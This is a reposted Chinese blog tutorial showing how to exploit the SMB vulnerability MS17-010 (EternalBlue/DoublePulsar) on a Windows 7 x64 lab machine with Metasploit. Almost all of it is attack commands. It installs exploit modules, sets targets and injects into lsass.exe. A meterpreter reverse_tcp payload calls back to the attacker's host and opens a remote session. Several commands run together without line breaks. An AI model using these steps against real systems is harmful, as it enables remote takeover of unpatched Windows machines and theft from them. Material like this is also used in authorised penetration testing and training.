smb(ms17-010)远程命令执行之msf
生活随笔
收集整理的這篇文章主要介紹了
smb(ms17-010)远程命令执行之msf
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
本次用到的環境:
kali(2016.2)32位系統.ip地址:192.168.1.104
目標靶機為:win7sp1x64系統(關閉防火墻),ip地址:192.168.1.105
具體的步驟如下:
kali系統下安裝wine32:
apt-get install wine32?
?
用wine32執行cmd.exe
wine cmd.exe?
exit //退出?
?git? clone下載其利用腳本:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit然后將腳本拷貝到?/usr/share/metasploit-framework/modules/exploits/windows/smb
cd Eternalblue-Doublepulsar-Metasploit/ cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb?
啟動msf,然后進行一系列設置:
service postgresql startmsfconsole
?
?
search eternalblueuse exploit/windows/smb/eternalblue_doublepulsar
?
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/depsset ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/depsset PROCESSINJECT lsass.exeset TARGETARCHITECTURE x64set rhost 192.168.1.105show targetsset target 9set payload windows/x64/meterpreter/reverse_tcpshow optionsset lhost 192.168.1.104exploit?
?
附錄:
msf下的ms17-010模塊:
前提條件:
1. gem install ruby_smb #ruby_smb模塊安裝
2.msfupdate ? #msf的更新
3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue" ?#啟動并加載模塊
?
root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rbUse exploit/windows/smb/ms17_010_eternalbluemsf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcpmsf exploit(ms17_010_eternalblue) >exploitMeterpreter> sysinfo?
?
?
?
?
?
?
轉載于:https://www.cnblogs.com/backlion/p/6804863.html
總結
以上是生活随笔為你收集整理的smb(ms17-010)远程命令执行之msf的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: NYOJ--1236--挑战密室(第八届
- 下一篇: 使用PHP实现用户登录和注册的功能